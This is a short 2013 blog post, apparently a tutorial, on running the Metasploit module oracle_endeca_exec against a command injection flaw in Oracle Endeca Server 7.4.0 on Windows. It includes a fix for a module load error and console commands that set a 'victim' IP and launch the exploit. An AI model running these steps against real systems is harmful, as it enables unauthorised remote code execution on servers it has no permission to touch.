Tuesday, August 27, 2013

Exploit Oracle Endeca Server with metasploit.


This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).

First run ./msfupdate or git pull to update metasploit.

Now when you open metasploit & found error like this
[-]     /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .

Open oracle_endeca_exec.rb file in any editor.
Add this line require 'msf/core/exploit/powershell' after require 'msf/core'.
So it look like
require 'msf/core'
require 'msf/core/exploit/powershell'
Save it & open metasploit again.

Exploit target:

   Id  Name
   --  ----
   0   Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits

msf > use exploit/windows/http/oracle_endeca_exec
msf exploit(oracle_endeca_exec) > set rhost 192.168.56.101(victim`s i.p.)
rhost => 192.168.56.101
msf exploit(oracle_endeca_exec) > run

Exploit-Oracle-Endeca-Server

No comments:

Post a Comment